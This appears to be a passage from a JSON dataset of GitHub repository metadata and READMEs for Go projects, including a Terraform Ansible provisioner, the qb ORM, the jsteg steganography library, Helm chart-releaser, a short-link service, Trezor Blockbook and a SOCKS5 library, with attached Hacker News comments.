[module](https://www.terraform.io/docs/modules/create.html). To include it, simply download the binary and enable it as a terraform module in your **terraformrc**.\n\n## Installation\n\n**terraform-provisioner-ansible** ships as a single binary and is compatible with **terraform**'s plugin interface. Behind the scenes, terraform plugins use https://github.com/hashicorp/go-plugin and communicate with the parent terraform process via RPC.\n\nTo install, download and un-archive the binary and place it on your path.\n\n```bash\n$ https://github.com/jonmorehouse/terraform-provisioner-ansible/releases/download/0.0.1-terraform-provisioner-ansible.tar.gz\n\n$ tar -xvf 0.0.1-terraform-provisioner-ansible.tar.gz /usr/local/bin\n```\n\nOnce installed, a `~/.terraformrc` file is used to _enable_ the plugin.\n\n```bash\nproviders {\n ansible = \"/usr/local/bin/terraform-provisioner-ansible\"\n}\n```\n\n## Usage\n\nOnce installed, you can provision resources by including an `ansible` provisioner block.\n\nThe following example demonstrates a configuration block to apply a host group's plays to new instances. 
You can specify a list of hostgroups and a list of plays to specify which ansible tasks to perform on the host.\n\nAdditionally, `groups` and `extra_vars` are accessible to resolve variables and group the new host in ansible.\n\n```\n{\n resource \"aws_instance\" \"terraform-provisioner-ansible-example\" {\n ami = \"ami-408c7f28\"\n instance_type = \"t1.micro\"\n\n provisioner \"ansible\" {\n connection {\n user = \"ubuntu\"\n }\n\n playbook = \"ansible/playbook.yml\"\n groups = [\"all\"]\n hosts = [\"terraform\"]\n extra_vars = {\n \"env\": \"terraform\" \n }\n }\n }\n}\n```\n\nCheck out [example](example/) for a more detailed walkthrough of the provisioner and how to provision resources with **ansible**.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slicebit/qb", "link": "https://github.com/slicebit/qb", "tags": ["golang", "go", "database", "db", "orm", "sql", "sqlite3", "sqlalchemy", "postgresql", "mysql"], "stars": 523, "description": "The database toolkit for go", "lang": "Go", "repo_lang": "", "readme": "![alt text](https://github.com/slicebit/qb/raw/master/qb_logo_128.png \"qb: the database toolkit for go\")\n\n# qb - the database toolkit for go\n\n[![Build Status](https://travis-ci.org/slicebit/qb.svg?branch=master)](https://travis-ci.org/slicebit/qb)\n[![Coverage Status](https://coveralls.io/repos/github/slicebit/qb/badge.svg?branch=master)](https://coveralls.io/github/slicebit/qb?branch=master)\n[![License (LGPL version 2.1)](https://img.shields.io/badge/license-GNU%20LGPL%20version%202.1-brightgreen.svg?style=flat)](http://opensource.org/licenses/LGPL-2.1)\n[![Go Report Card](https://goreportcard.com/badge/github.com/slicebit/qb)](https://goreportcard.com/report/github.com/slicebit/qb)\n[![GoDoc](https://godoc.org/github.com/golang/gddo?status.svg)](http://godoc.org/github.com/slicebit/qb)\n\n**This project is currently pre 1.**\n\nCurrently, it's not feature complete. It can have potential bugs. There are no tests covering concurrency race conditions. It can crash especially in concurrency.\nBefore 1.x releases, each major release could break backwards compatibility.\n\nAbout qb\n--------\nqb is a database toolkit for easier db queries in go. It is inspired from python's best orm, namely sqlalchemy. qb is an orm(sqlx) as well as a query builder. It is quite modular in case of using just expression api and query building stuff.\n\n[Documentation](https://qb.readme.io)\n-------------\nThe documentation is hosted in [readme.io](https://qb.readme.io) which has great support for markdown docs. Currently, the docs are about 80% - 90% complete. The doc files will be added to this repo soon. Moreover, you can check the godoc from [here](https://godoc.org/github.com/slicebit/qb). Contributions & Feedbacks in docs are welcome.\n\nFeatures\n--------\n- Support for postgres(9.5.+), mysql & sqlite3\n- Powerful expression API for building queries & table ddls\n- Struct to table ddl mapper where initial table migrations can happen\n- Transactional session api that auto map structs to queries\n- Foreign key definitions\n- Single & Composite column indices\n- Relationships (soon.. 
probably in 0.3 milestone)\n\nInstallation\n------------\n```sh\ngo get -u github.com/slicebit/qb\n```\nIf you want to install test dependencies then;\n```sh\ngo get -u -t github.com/slicebit/qb\n```\n\nQuick Start\n-----------\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/slicebit/qb\"\n\t_ \"github.com/mattn/go-sqlite3\"\n _ \"github.com/slicebit/qb/dialects/sqlite\"\n)\n\ntype User struct {\n\tID string `db:\"id\"`\n\tEmail string `db:\"email\"`\n\tFullName string `db:\"full_name\"`\n\tOscars int `db:\"oscars\"`\n}\n\nfunc main() {\n\n\tusers := qb.Table(\n\t\t\"users\",\n\t\tqb.Column(\"id\", qb.Varchar().Size(40)),\n\t\tqb.Column(\"email\", qb.Varchar()).NotNull().Unique(),\n\t\tqb.Column(\"full_name\", qb.Varchar()).NotNull(),\n\t\tqb.Column(\"oscars\", qb.Int()).NotNull().Default(0),\n\t\tqb.PrimaryKey(\"id\"),\n\t)\n\n\tdb, err := qb.New(\"sqlite3\", \"./qb_test.db\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdefer db.Close()\n\n\tmetadata := qb.MetaData()\n\n\t// add table to metadata\n\tmetadata.AddTable(users)\n\n\t// create all tables registered to metadata\n\tmetadata.CreateAll(db)\n\tdefer metadata.DropAll(db) // drops all tables\n\n\tins := qb.Insert(users).Values(map[string]interface{}{\n\t\t\"id\": \"b6f8bfe3-a830-441a-a097-1777e6bfae95\",\n\t\t\"email\": \"jack@nicholson.com\",\n\t\t\"full_name\": \"Jack Nicholson\",\n\t})\n\n\t_, err = db.Exec(ins)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// find user\n\tvar user User\n\n\tsel := qb.Select(users.C(\"id\"), users.C(\"email\"), users.C(\"full_name\")).\n\t\tFrom(users).\n\t\tWhere(users.C(\"id\").Eq(\"b6f8bfe3-a830-441a-a097-1777e6bfae95\"))\n\n\terr = db.Get(sel, &user)\n\tfmt.Printf(\"%+v\\n\", user)\n}\n```\n\nCredits\n-------\n- [Aras Can Ak\u0131n](https://github.com/aacanakin)\n- [Christophe de Vienne](https://github.com/cdevienne)\n- [Onur \u015eent\u00fcre](https://github.com/onursenture)\n- [Aaron O. Ellis](https://github.com/aodin)\n- [Shawn Smith](https://github.com/shawnps)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lukechampine/jsteg", "link": "https://github.com/lukechampine/jsteg", "tags": ["steganography", "jpeg"], "stars": 523, "description": "JPEG steganography", "lang": "Go", "repo_lang": "", "readme": "jsteg\n-----\n\n[![GoDoc](https://godoc.org/lukechampine.com/jsteg?status.svg)](https://godoc.org/lukechampine.com/jsteg)\n[![Go Report Card](http://goreportcard.com/badge/lukechampine.com/jsteg)](https://goreportcard.com/report/lukechampine.com/jsteg)\n\n```\ngo get lukechampine.com/jsteg\n```\n\n`jsteg` is a package for hiding data inside jpeg files, a technique known as\n[steganography](https://en.wikipedia.org/wiki/steganography). This is accomplished\nby copying each bit of the data into the least-significant bits of the image.\nThe amount of data that can be hidden depends on the filesize of the jpeg; it\ntakes about 10-14 bytes of jpeg to store each byte of the hidden data.\n\n## Example\n\n```go\n// open an existing jpeg\nf, _ := os.Open(filename)\nimg, _ := jpeg.Decode(f)\n\n// add hidden data to it\nout, _ := os.Create(outfilename)\ndata := []byte(\"my secret data\")\njsteg.Hide(out, img, data, nil)\n\n// read hidden data:\nhidden, _ := jsteg.Reveal(out)\n```\n\nNote that the data is not demarcated in any way; the caller is responsible for\ndetermining which bytes of `hidden` it cares about. 
The easiest way to do this\nis to prepend the data with its length.\n\nA `jsteg` command is included, providing a simple wrapper around the\nfunctions of this package. It can hide and reveal data in jpeg files and\nsupports input/output redirection. It automatically handles length prefixes\nand uses a magic header to identify jpegs that were produced by `jsteg`.\n\nA more narrowly-focused command named `slink` is also included. `slink` embeds\na public key in a jpeg, and makes it easy to sign data and verify signatures\nusing keypairs derived from password strings. See [cmd/slink](cmd/slink) for a\nfull description.\n\nBinaries for both commands can be found [here](https://github.com/lukechampine/jsteg/releases).\n\n---\n\nThis package reuses a significant amount of code from the image/jpeg package.\nThe BSD-style license that governs the use of that code can be found in the\n`go_LICENSE` file.\n", "readme_type": "markdown", "hn_comments": "More about the JSTEG algorithm:\nhttps://pdfs.semanticscholar.org/8893/ba76f2e358e80ef5bd93e4...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "helm/chart-releaser", "link": "https://github.com/helm/chart-releaser", "tags": ["helm", "charts", "kubernetes", "repository", "hosting"], "stars": 523, "description": "Hosting Helm Charts via GitHub Pages and Releases", "lang": "Go", "repo_lang": "", "readme": "# Chart Releaser\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n![CI](https://github.com/helm/chart-releaser/workflows/CI/badge.svg?branch=main&event=push)\n\n**Helps Turn GitHub Repositories into Helm Chart Repositories**\n\n`cr` is a tool designed to help GitHub repos self-host their own chart repos by adding Helm chart artifacts to GitHub Releases named for the chart version and then creating an `index.yaml` file for those releases that can be hosted on GitHub Pages (or elsewhere!).\n\n## Installation\n\n### Binaries (recommended)\n\nDownload your preferred asset from the [releases page](https://github.com/helm/chart-releaser/releases) and install manually.\n\n### Homebrew\n\n```console\n$ brew tap helm/tap\n$ brew install chart-releaser\n```\n\n### Go get (for contributing)\n\n```console\n$ # clone repo to some directory outside GOPATH\n$ git clone https://github.com/helm/chart-releaser\n$ cd chart-releaser\n$ go mod download\n$ go install ./...\n```\n\n### Docker (for Continuous Integration)\n\nDocker images are pushed to the [helmpack/chart-releaser](https://quay.io/repository/helmpack/chart-releaser?tab=tags) Quay container registry. The Docker image is built on top of Alpine and its default entry-point is `cr`. 
See the [Dockerfile](./Dockerfile) for more details.\n\n## Usage\n\nCurrently, `cr` can create GitHub Releases from a set of charts packaged up into a directory and create an `index.yaml` file for the chart repository from GitHub Releases.\n\n```console\n$ cr --help\nCreate Helm chart repositories on GitHub Pages by uploading Chart packages\nand Chart metadata to GitHub Releases and creating a suitable index file\n\nUsage:\n cr [command]\n\nAvailable Commands:\n completion generate the autocompletion script for the specified shell\n help Help about any command\n index Update Helm repo index.yaml for the given GitHub repo\n package Package Helm charts\n upload Upload Helm chart packages to GitHub Releases\n version Print version information\n\nFlags:\n --config string Config file (default is $HOME/.cr.yaml)\n -h, --help help for cr\n\nUse \"cr [command] --help\" for more information about a command.\n```\n\n### Create GitHub Releases from Helm Chart Packages\n\nScans a path for Helm chart packages and creates releases in the specified GitHub repo uploading the packages.\n\n```console\n$ cr upload --help\nUpload Helm chart packages to GitHub Releases\n\nUsage:\n cr upload [flags]\n\nFlags:\n -c, --commit string Target commit for release\n --generate-release-notes Whether to automatically generate the name and body for this release. See https://docs.github.com/en/rest/releases/releases\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for upload\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --release-notes-file string Markdown file with chart release notes. If it is set to empty string, or the file is not found, the chart description will be used instead. 
The file is read from the chart package\n --skip-existing Skip upload if release exists\n -t, --token string GitHub Auth Token\n --make-release-latest bool Mark the created GitHub release as 'latest' (default \"true\")\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n### Create the Repository Index from GitHub Releases\n\nOnce uploaded you can create an `index.yaml` file that can be hosted on GitHub Pages (or elsewhere).\n\n```console\n$ cr index --help\nUpdate a Helm chart repository index.yaml file based on a the\ngiven GitHub repository's releases.\n\nUsage:\n cr index [flags]\n\nFlags:\n -b, --git-base-url string GitHub Base URL (only needed for private GitHub) (default \"https://api.github.com/\")\n -r, --git-repo string GitHub repository\n -u, --git-upload-url string GitHub Upload URL (only needed for private GitHub) (default \"https://uploads.github.com/\")\n -h, --help help for index\n -i, --index-path string Path to index file (default \".cr-index/index.yaml\")\n -o, --owner string GitHub username or organization\n -p, --package-path string Path to directory with chart packages (default \".cr-release-packages\")\n --pages-branch string The GitHub pages branch (default \"gh-pages\")\n --pages-index-path string The GitHub pages index path (default \"index.yaml\")\n --pr Create a pull request for index.yaml against the GitHub Pages branch (must not be set if --push is set)\n --push Push index.yaml to the GitHub Pages branch (must not be set if --pr is set)\n --release-name-template string Go template for computing release names, using chart metadata (default \"{{ .Name }}-{{ .Version }}\")\n --remote string The Git remote used when creating a local worktree for the GitHub Pages branch (default \"origin\")\n -t, --token string GitHub Auth Token (only needed for private repos)\n\nGlobal Flags:\n --config string Config file (default is $HOME/.cr.yaml)\n```\n\n## Configuration\n\n`cr` is a command-line application.\nAll command-line flags can also be set via environment variables or config file.\nEnvironment variables must be prefixed with `CR_`.\nUnderscores must be used instead of hyphens.\n\nCLI flags, environment variables, and a config file can be mixed.\nThe following order of precedence applies:\n\n1. CLI flags\n1. Environment variables\n1. Config file\n\n### Examples\n\nThe following example show various ways of configuring the same thing:\n\n#### CLI\n\n cr upload --owner myaccount --git-repo helm-charts --package-path .deploy --token 123456789\n\n#### Environment Variables\n\n export CR_OWNER=myaccount\n export CR_GIT_REPO=helm-charts\n export CR_PACKAGE_PATH=.deploy\n export CR_TOKEN=\"123456789\"\n export CR_GIT_BASE_URL=\"https://api.github.com/\"\n export CR_GIT_UPLOAD_URL=\"https://uploads.github.com/\"\n export CR_SKIP_EXISTING=true\n\n cr upload\n\n#### Config File\n\n`config.yaml`:\n\n```yaml\nowner: myaccount\ngit-repo: helm-charts\npackage-path: .deploy\ntoken: 123456789\ngit-base-url: https://api.github.com/\ngit-upload-url: https://uploads.github.com/\n```\n\n#### Config Usage\n\n cr upload --config config.yaml\n\n\n`cr` supports any format [Viper](https://github.com/spf13/viper) can read, i. e. 
JSON, TOML, YAML, HCL, and Java properties files.\n\nNotice that if no config file is specified, `cr.yaml` (or any of the supported formats) is loaded from the current directory, `$HOME/.cr`, or `/etc/cr`, in that order, if found.\n\n#### Notes for Github Enterprise Users\n\nFor Github Enterprise, `chart-releaser` users need to set `git-base-url` and `git-upload-url` correctly, but the correct values are not always obvious to endusers.\n\nBy default they are often along these lines:\n\n```\nhttps://ghe.example.com/api/v3/\nhttps://ghe.example.com/api/uploads/\n```\n\nIf you are trying to figure out what your `upload_url` is try to use a curl command like this:\n`curl -u username:token https://example.com/api/v3/repos/org/repo/releases`\nand then look for `upload_url`. You need the part of the URL that appears before `repos/` in the path.\n\n##### Known Bug\n\nCurrently, if you set the upload URL incorrectly, let's say to something like `https://example.com/uploads/`, then `cr upload` will appear to work, but the release will not be complete. When everything is working there should be 3 assets in each release, but instead there will only be the 2 source code assets. The third asset, which is what helm actually uses, is missing. This issue will become apparent when you run `cr index` and it always claims that nothing has changed, because it can't find the asset it expects for the release.\n\nIt appears like the [go-github Do call](https://github.com/google/go-github/blob/master/github/github.go#L520) does not catch the fact that the upload URL is incorrect and pass back the expected error. If the asset upload fails, it would be better if the release was rolled back (deleted) and an appropriate log message is be displayed to the user.\n\nThe `cr index` command should also generate a warning when a release has no assets attached to it, to help people detect and troubleshoot this type of problem.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kellegous/go", "link": "https://github.com/kellegous/go", "tags": [], "stars": 522, "description": "Another Google-like Go short link service", "lang": "Go", "repo_lang": "", "readme": "# A \"go\" short-link service\n\n## Background\nThe first time I encountered \"go\" links was at Google. Anyone on the corporate\nnetwork could register a URL shortcut and it would redirect the user to the\nappropriate page. So for instance, if you wanted to find out more about BigTable,\nyou simply directed your browser at http://go/bigtable and you would be redirected to\nsomething about the BigTable data storage system. I was later told that the\nfirst go service at Google was written by [Benjamin Staffin](https://www.linkedin.com/in/benjaminstaffin)\nto end the never-ending stream of requests for internal CNAME entries. He\ndescribed it as AOL keywords for the corporate network. These days if you go to\nany reasonably sized company, you are likely to find a similar system. Etsy made\none after seeing that Twitter had one ... it's a contagious and useful little\ntool. So contagious, in fact, that many former Googlers that I know have built\nor contributed to a similar system post-Google. 
I am no different, this is my\n\"go\" link service.\n\nOne slight difference between this go service and Google's is that this one is also\ncapable of generating short links for you.\n\n## Installation\nThis tool is written in Go (ironically) and can be easily installed and started\nwith the following commands.\n\n```\nGOPATH=`pwd` go install github.com/kellegous/go\nbin/go\n```\n\nBy default, the service will put all of its data in the directory `data` and will\nlisten to requests on the port `8067`. Both of these, however, are easily configured\nusing the `--data=/path/to/data` and `--addr=:80` command line flags.\n\n## DNS Setup\nTo get the most benefit from the service, you should setup a DNS entry on your\nlocal network, `go.corp.mycompany.com`. Make sure that corp.mycompany.com is in\nthe search domains for each user on the network. This is usually easily accomplished\nby configuring your DHCP server. Now, simply typing \"go\" into your browser should\ntake you to the service, where you can register shortcuts. Obviously, those\nshortcuts will also be available by typing \"go/shortcut\".\n\n## Using the Service\nOnce you have it all setup, using it is pretty straight-forward.\n\n#### Create a new shortcut\nType `go/edit/my-shortcut` and enter the URL.\n\n#### Visit a shortcut\nType `go/my-shortcut` and you'll be redirected to the URL.\n\n#### Shorten a URL\nType `go` and enter the URL.\n", "readme_type": "markdown", "hn_comments": "ArchiveTeam is extracting all the data from Google Reader and uploading it to the Internet Archive. Help out by submitting your OPML file: https://news.ycombinator.com/item?id=5958119Thanks mihaip!Worked successfully in Windows CMD for me, without using the \\bin shell script: cd C:\\mihaip-readerisdead\n set PYTHON_HOME=C:\\mihaip-readerisdead\n C:\\path-to-py27 reader_archive\\reader_archive.py --output-directory C:\\mystuff\n\nLocked up at 251K out of 253K items for me, though. Restarting... success! Looks like it might have locked up trying to start the \"Fetching comments\" section on my first try.I guess archived RSS data for me isn't terribly important since most people seem to hide the rest of their content behind a \"More\" link to get those precious ad views.Warning to other impatient users:I didn't read the instructions too well, so the half hour I spent carefully deleting gigantic/uninteresting feeds out of my subscriptions.xml file was all for naught. Because I didn't know I needed to specify the opml_file on the command line, the script just logged into my Reader account (i.e., it walked me through the browser-based authorization process) and downloaded my subscriptions from there -- including all the gigantic/uninteresting subscriptions that I did NOT care to download.So now I've gone and downloaded 2,592,159 items, consuming 13 GB of space.I'm NOT complaining -- I actually think it's AWESOME that this is possible -- but if you don't want to download millions of items, be sure to read the instructions and use the opml_file directive.If this does what I think it does(And it seems to be doing it now on my machine), then this is truly, truly awesome.Thank you. mihaip, if you are ever in Houston I will buy you a beer/ and or a steak dinner.This is excellent, thank you for making this! 
I'm using it right now to make an offline archive of my Reader stuff.My only gripe would be the tool's inability to continue after a partial run, but since I won't be using this more than once that's probably OK.All web services should have a handy CLI extraction tool, preferably one that can be run from a CRON call. On that note, I'm very happy with gm_vault, as well.Edit: getting a lot of XML parse errors, by the way.Thank you for this!\nNow I can procrastinate on my own reader app for much longer :)Should we be concerned with errors like this? [W 130629 03:11:54 api:254] Requested item id tag:google.com,2005:reader/item/afe90dad8acde78b (-5771066408489326709), but it was not found in the result\n\nI'm getting ~1-2 per \"Fetch N/M item bodies\" line.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.I'm getting \"ImportError: No module named site\"echo %pythonpath% gives c:\\readerisdeadI copied 'base' from the readerisdead zipfile to c:\\python27\\lib & also copied the base folder into the same folder as reader_archive.pyC:\\readerisdead\\reader_archive\\reader_archive.py --output-directory C:\\googlereader gives \"ImportError: No module named site\"What am I doing wrong? How can I get this to work?This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.This is an impressive bit of work. I have had, though, an interesting thing happen, in that it's apparently trying to pull every single item from explore and from suggested items in, to the extent that I get a message saying I have 13 million items, and still going strong -- it pulled about 5 or 6 gig of data down .Is there some way to avoid all the years of explore and suggested items with reader archive? I tried limiting the maximum number of items to 10.000 but it was still running and growing after 12 hours. Interesting though, what it was able to accomplish in that time.The title has it right. 
I never knew this existed, but it seems like something I've been looking for... Is it worth trying out at its current (open) state? Or is it just another failed Google Lab experiment?I smell DART in the air.\nThis won't be the last JS app they will abandon.I'm assuming this was the \"Brightly\" from that leaked Dart memo[0] some time back. Disappointing, I was a little excited to see what Google could bring to the IDE space.[0] https://gist.github.com/1208618/", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "trezor/blockbook", "link": "https://github.com/trezor/blockbook", "tags": ["bitcoin", "backend", "trezor"], "stars": 522, "description": ":blue_book: Trezor address/account balance backend ", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/trezor/blockbook)](https://goreportcard.com/report/trezor/blockbook)\n\n# Blockbook\n\n**Blockbook** is back-end service for Trezor wallet. Main features of **Blockbook** are:\n\n- index of addresses and address balances of the connected block chain\n- fast index search\n- simple blockchain explorer\n- websocket, API and legacy Bitcore Insight compatible socket.io interfaces\n- support of multiple coins (Bitcoin and Ethereum type) with easy extensibility to other coins\n- scripts for easy creation of debian packages for backend and blockbook\n\n## Build and installation instructions\n\nOfficially supported platform is **Debian Linux** and **AMD64** architecture.\n\nMemory and disk requirements for initial synchronization of **Bitcoin mainnet** are around 32 GB RAM and over 180 GB of disk space. After initial synchronization, fully synchronized instance uses about 10 GB RAM.\nOther coins should have lower requirements, depending on the size of their block chain. Note that fast SSD disks are highly\nrecommended.\n\nUser installation guide is [here](https://wiki.trezor.io/User_manual:Running_a_local_instance_of_Trezor_Wallet_backend_(Blockbook)).\n\nDeveloper build guide is [here](/docs/build.md).\n\nContribution guide is [here](CONTRIBUTING.md).\n\n## Implemented coins\n\nBlockbook currently supports over 30 coins. The Trezor team implemented \n\n- Bitcoin, Bitcoin Cash, Zcash, Dash, Litecoin, Bitcoin Gold, Ethereum, Ethereum Classic, Dogecoin, Namecoin, Vertcoin, DigiByte, Liquid\n\nthe rest of coins were implemented by the community.\n\nTestnets for some coins are also supported, for example:\n- Bitcoin Testnet, Bitcoin Cash Testnet, ZCash Testnet, Ethereum Testnet Ropsten\n\nList of all implemented coins is in [the registry of ports](/docs/ports.md).\n\n## Common issues when running Blockbook or implementing additional coins\n\n#### Out of memory when doing initial synchronization\n\nHow to reduce memory footprint of the initial sync: \n\n- disable rocksdb cache by parameter `-dbcache=0`, the default size is 500MB\n- run blockbook with parameter `-workers=1`. This disables bulk import mode, which caches a lot of data in memory (not in rocksdb cache). It will run about twice as slowly but especially for smaller blockchains it is no problem at all.\n\nPlease add your experience to this [issue](https://github.com/trezor/blockbook/issues/43).\n\n#### Error `internalState: database is in inconsistent state and cannot be used`\n\nBlockbook was killed during the initial import, most commonly by OOM killer. \nBy default, Blockbook performs the initial import in bulk import mode, which for performance reasons does not store all data immediately to the database. 
If Blockbook is killed during this phase, the database is left in an inconsistent state. \n\nSee above how to reduce the memory footprint, delete the database files and run the import again. \n\nCheck [this](https://github.com/trezor/blockbook/issues/89) or [this](https://github.com/trezor/blockbook/issues/147) issue for more info.\n\n#### Running on Ubuntu\n\n[This issue](https://github.com/trezor/blockbook/issues/45) discusses how to run Blockbook on Ubuntu. If you have some additional experience with Blockbook on Ubuntu, please add it to [this issue](https://github.com/trezor/blockbook/issues/45).\n\n#### My coin implementation is reporting parse errors when importing blockchain\n\nYour coin's block/transaction data may not be compatible with `BitcoinParser` `ParseBlock`/`ParseTx`, which is used by default. In that case, implement your coin in a similar way we used in case of [zcash](https://github.com/trezor/blockbook/tree/master/bchain/coins/zec) and some other coins. The principle is not to parse the block/transaction data in Blockbook but instead to get parsed transactions as json from the backend.\n\n## Data storage in RocksDB\n\nBlockbook stores data the key-value store RocksDB. Database format is described [here](/docs/rocksdb.md).\n\n## API\n\nBlockbook API is described [here](/docs/api.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "txthinking/socks5", "link": "https://github.com/txthinking/socks5", "tags": ["socks", "socks5", "socks-protocol", "proxy"], "stars": 522, "description": "SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support", "lang": "Go", "repo_lang": "", "readme": "## socks5\n\n[English](README.md)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/txthinking/socks5)](https://goreportcard.com/report/github.com/txthinking/socks5)\n[![GoDoc](https://godoc.org/github.com/txthinking/socks5?status.svg)](https://godoc.org/github.com/txthinking/socks5)\n\n[\ud83d\udde3 News](https://t.me/txthinking_news)\n[\ud83e\ude78 Youtube](https://www.youtube.com/txthinking)\n[\u2764\ufe0f Sponsor](https://github.com/sponsors/txthinking)\n\nSOCKS Protocol Version 5 Library.\n\n\u5b8c\u6574 TCP/UDP \u548c IPv4/IPv6 \u652f\u6301.\n\u76ee\u6807: KISS, less is more, small API, code is like the original protocol.\n\n\u2764\ufe0f A project by [txthinking.com](https://www.txthinking.com)\n\n### \u83b7\u53d6\n```\n$ go get github.com/txthinking/socks5\n```\n\n### Struct\u7684\u6982\u5ff5 \u5bf9\u6807 \u539f\u59cb\u534f\u8bae\u91cc\u7684\u6982\u5ff5\n\n* Negotiation:\n * `type NegotiationRequest struct`\n * `func NewNegotiationRequest(methods []byte)`, in client\n * `func (r *NegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type NegotiationReply struct`\n * `func NewNegotiationReply(method byte)`, in server\n * `func (r *NegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewNegotiationReplyFrom(r io.Reader)`, client reads from server\n* User and password negotiation:\n * `type UserPassNegotiationRequest struct`\n * `func NewUserPassNegotiationRequest(username []byte, password []byte)`, in client\n * `func (r *UserPassNegotiationRequest) WriteTo(w io.Writer)`, client writes to server\n * `func NewUserPassNegotiationRequestFrom(r io.Reader)`, server reads from client\n * `type UserPassNegotiationReply struct`\n * `func 
NewUserPassNegotiationReply(status byte)`, in server\n * `func (r *UserPassNegotiationReply) WriteTo(w io.Writer)`, server writes to client\n * `func NewUserPassNegotiationReplyFrom(r io.Reader)`, client reads from server\n* Request:\n * `type Request struct`\n * `func NewRequest(cmd byte, atyp byte, dstaddr []byte, dstport []byte)`, in client\n * `func (r *Request) WriteTo(w io.Writer)`, client writes to server\n * `func NewRequestFrom(r io.Reader)`, server reads from client\n * After server gets the client's *Request, processes...\n* Reply:\n * `type Reply struct`\n * `func NewReply(rep byte, atyp byte, bndaddr []byte, bndport []byte)`, in server\n * `func (r *Reply) WriteTo(w io.Writer)`, server writes to client\n * `func NewReplyFrom(r io.Reader)`, client reads from server\n* Datagram:\n * `type Datagram struct`\n * `func NewDatagram(atyp byte, dstaddr []byte, dstport []byte, data []byte)`\n * `func NewDatagramFromBytes(bb []byte)`\n * `func (d *Datagram) Bytes()`\n\n### \u9ad8\u7ea7 API\n\n> \u8fd9\u53ef\u4ee5\u6ee1\u8db3\u7ecf\u5178\u573a\u666f\uff0c\u7279\u6b8a\u573a\u666f\u63a8\u8350\u4f60\u9009\u62e9\u4e0a\u9762\u7684\u5c0fAPI\u6765\u81ea\u5b9a\u4e49\u3002\n\n**Server**: \u652f\u6301UDP\u548cTCP\n\n* `type Server struct`\n* `type Handler interface`\n * `TCPHandle(*Server, *net.TCPConn, *Request) error`\n * `UDPHandle(*Server, *net.UDPAddr, *Datagram) error`\n\n\u4e3e\u4f8b:\n\n```\nserver, _ := NewClassicServer(addr, ip, username, password, tcpTimeout, udpTimeout)\nserver.ListenAndServe(Handler)\n```\n\n**Client**: \u652f\u6301TCP\u548cUDP, \u8fd4\u56denet.Conn\n\n* `type Client struct`\n\n\u4e3e\u4f8b:\n\n```\nclient, _ := socks5.NewClient(server, username, password, tcpTimeout, udpTimeout)\nconn, _ := client.Dial(network, addr)\n```\n\n\n### \u8c01\u5728\u4f7f\u7528\u6b64\u9879\u76ee\n\n- Brook: https://github.com/txthinking/brook\n- Shiliew: https://www.txthinking.com/shiliew.html\n- dismap: https://github.com/zhzyker/dismap\n- emp3r0r: https://github.com/jm33-m0/emp3r0r\n- hysteria: https://github.com/apernet/hysteria\n- mtg: https://github.com/9seconds/mtg\n- trojan-go: https://github.com/p4gefau1t/trojan-go\n\n## \u5f00\u6e90\u534f\u8bae\n\n\u57fa\u4e8e MIT \u534f\u8bae\u5f00\u6e90\n", "readme_type": "markdown", "hn_comments": "Next time someone says to me that language's popularity doesn't matter for it's utility, I'll remember how Go's socks library appears on the front page of HN, while my pull request the Haskell's socks library (which implements the most basic feature that author added to the top of TODO list himself) is sitting unmerged and uncommented now for almost a year.(1) (If I sound bitter it's because I am.)Seriously though, such \"boring\" libraries that you just need in your toolbox are a great way to evaluate the health of the whole ecosystem.[1][https://github.com/vincenthz/hs-socks/pull/24]If I only want the client side, does this add anything over https://godoc.org/golang.org/x/net/proxy ?Honest question: What do people use Socks for? Personally I haven\u2019t used it since Firesheep...Last time I needed a SOCKS5 server + client in Go, I remember using github.com/getlantern/go-socks5. What does this offer above that?I will always say this was a complete hack to a specific time in history. 
